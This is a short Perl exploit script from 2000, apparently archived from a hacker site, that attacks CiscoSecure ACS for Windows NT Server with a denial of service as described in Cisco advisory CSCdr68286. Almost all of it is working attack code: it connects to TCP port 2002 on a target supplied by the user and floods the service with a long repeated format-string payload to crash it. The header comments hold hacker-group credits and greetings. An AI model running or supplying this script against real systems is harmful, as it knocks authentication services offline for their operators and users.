#!/usr/bin/perl # # Coded by:netsym and doom for rsh # rootshellhackers@hushmail.com and smashstack@hushmail.com # http://www.8op.com/rsh # Denial of Service Vulnerability in CiscoSecure ACS for Windows NT Server # detailed in Cisco advisory CSCdr68286 # It would be nice for someone who knows asm for Windows to email us # Thanks to Dethy,Datagram,Mixter,Anarcho,bi0cide,Initd,0x7f Security Research, # Matic,Mystik,Kave,Sniper of Dugnet,Sniper of GForce,Piffy and RootShellHackers # It is sad that people have too do what I have seen Hitler's Crew do in there # latest defacements on Attrition located at attrition.org use IO::Socket; use Getopt::Std; getopts('s:', \%args); if(!defined($args{s})){&usage; } $serv = $args{s}; $foo = "%%%%%XX%%%%%"; $number = 30000; $data .= $foo x $number; $EOL="\015\012"; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "(2002)", ) || die("Unable to connect to port 2002 on $args{s}\n"); $remote->autoflush(1); print $remote "$data". $EOL; while (<$remote>){ print } print("\nPackets Sent\n"); sub usage {die("\n$0 -s \n\n");} # www.hack.co.za [29 September 2000]#